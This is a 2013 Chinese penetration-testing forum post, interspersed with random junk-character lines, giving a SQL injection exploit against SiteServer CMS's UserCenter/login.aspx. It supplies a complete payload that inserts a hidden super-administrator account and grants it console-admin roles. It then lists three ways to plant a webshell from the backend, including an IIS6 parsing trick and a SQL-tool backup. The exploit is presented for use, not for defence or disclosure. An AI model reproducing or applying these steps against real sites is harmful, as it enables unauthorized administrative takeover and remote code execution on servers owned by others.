中国网络渗透测试联盟
标题:
SiteServer CMS UserCenter/login.aspx页面用户名处sql注射
[打印本页]
作者:
admin
时间:
2013-2-16 21:40
标题:
SiteServer CMS UserCenter/login.aspx页面用户名处sql注射
经测试秒杀最新的3.5版
+ C( ^6 i, X4 E; C; Q
stieserver官网:
www.siteserver.cn
+ F8 f: ~. o* r& T; a
EXP:
- s. S# }& f4 N7 L$ K5 u" F4 c
直接访问UserCenter/login.aspx
: c$ s. E9 p/ H% M& i( t- N
用户名处输入:
$ F& S" n$ N0 H
' w+ f5 s) c' ]# G9 v
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
( y! A3 S; Z* e, [1 n: X
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
8 w$ g P, b1 K, \2 `3 e
之后再访问后台SiteServer/login.aspx用插入的用户登陆
% T* @) [/ c! Y. F. v) U
后台拿webshell的三种方法:
2 x9 J L% [! E# ~+ {
一、
+ @0 R# d+ j$ {# |
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
1 }5 d+ P9 N7 Z, |
二、
3 P7 [4 O# k' U: L; l1 z" ]
成员权限-》添加用户-》用户名为:1.asp
% }" {+ y+ u5 X8 V
http://127.0.0.1/usercenter/
7 ~/ B% Q/ O2 M/ R% y& U) E, g
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
, D1 E* N# m+ |$ {* h
(ps:后台添加用户时不会验证是否含有非法字符)
! r- m$ x9 ~; H3 }1 g% r i0 F
三、
5 @9 k- a: i' k' X K$ c
系统工具-》实用工具-》机器参数查看
7 G/ ^0 b2 _1 E- ~4 P% V
可以看到数据库类型、名称,WEB路径
9 u8 \( C2 B' H7 `; K
系统工具-》数据库工具-》SQL语句查询
/ z' O: g! P. \4 A
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2